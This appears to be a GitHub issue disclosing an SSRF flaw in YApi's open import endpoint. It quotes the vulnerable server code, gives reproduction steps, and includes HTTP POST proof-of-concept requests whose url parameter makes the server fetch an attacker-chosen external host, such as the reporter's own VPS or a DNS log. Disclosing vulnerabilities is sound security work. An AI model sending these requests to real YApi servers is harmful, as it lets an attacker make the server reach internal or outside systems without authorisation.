YApi--SSRF(Server-Side Request Forgery) #2791
Description
YApi--SSRF(Server-Side Request Forgery)
Vulnerability Overview
| Item | Details |
|---|---|
| Vulnerability Type | SSRF(Server-Side Request Forgery) |
| Affected Endpoint | /api/open/import_data |
| HTTP Method | POST |
| Vulnerable Parameter | url |
| Risk Level | High |
| Affected Scope | The latest version is affected |
Proof of Concept (PoC):
POST /api/open/import_data HTTP/2
Host: target
Cookie: your_yapi_token
Content-Type: application/json
{"type": "swagger", "url": "http(s)://example.com","token": "<valid_project_token>","project_id": "<target_project_id>"}Vulnerable Code
Entry point: (Open import): /api/open/import_data receives the url parameter, and the server directly requests the remote resource and parses it as JSON.
if (!content && !ctx.params.url) {
return (ctx.body = yapi.commons.resReturn(null, 40022, 'json 或者 url 参数,不能都为空'));
}
...
if(ctx.params.url){
content = await syncGet(ctx.params.url);
}else if(content.indexOf('http://') === 0 || content.indexOf('https://') === 0){
content = await syncGet(content);
}
content = JSON.parse(content);async swaggerUrl(ctx) {
const { url } = ctx.request.query;
const { data } = await axios.get(url);
if (data == null || typeof data !== 'object') {
throw new Error('返回数据格式不是 JSON');
}
ctx.body = yapi.commons.resReturn(data);
}
Reproduction Steps
First, log in and create a project.
After creating it, obtain the project and enter it.
Inspect the request packet — from that packet you can extract the project_id and its corresponding token.
Take the project_id and its corresponding token, then use the PoC to verify the SSRF by sending a request to my personal VPS.
POST /api/open/import_data HTTP/2
Host: target
Cookie:your_yapi_token
Content-Type: application/json
{"type": "swagger", "url": "http://{IP:port}","token": "{token}","project_id": "{project_id}"}
Attempt a DNS log request.
When requesting a non-existent address, it will return the message getaddrinfo ENOTFOUND.
This demonstrates that an SSRF exists at this location.
Remediation Recommendations
disable the registration feature and place the system inside the internal network.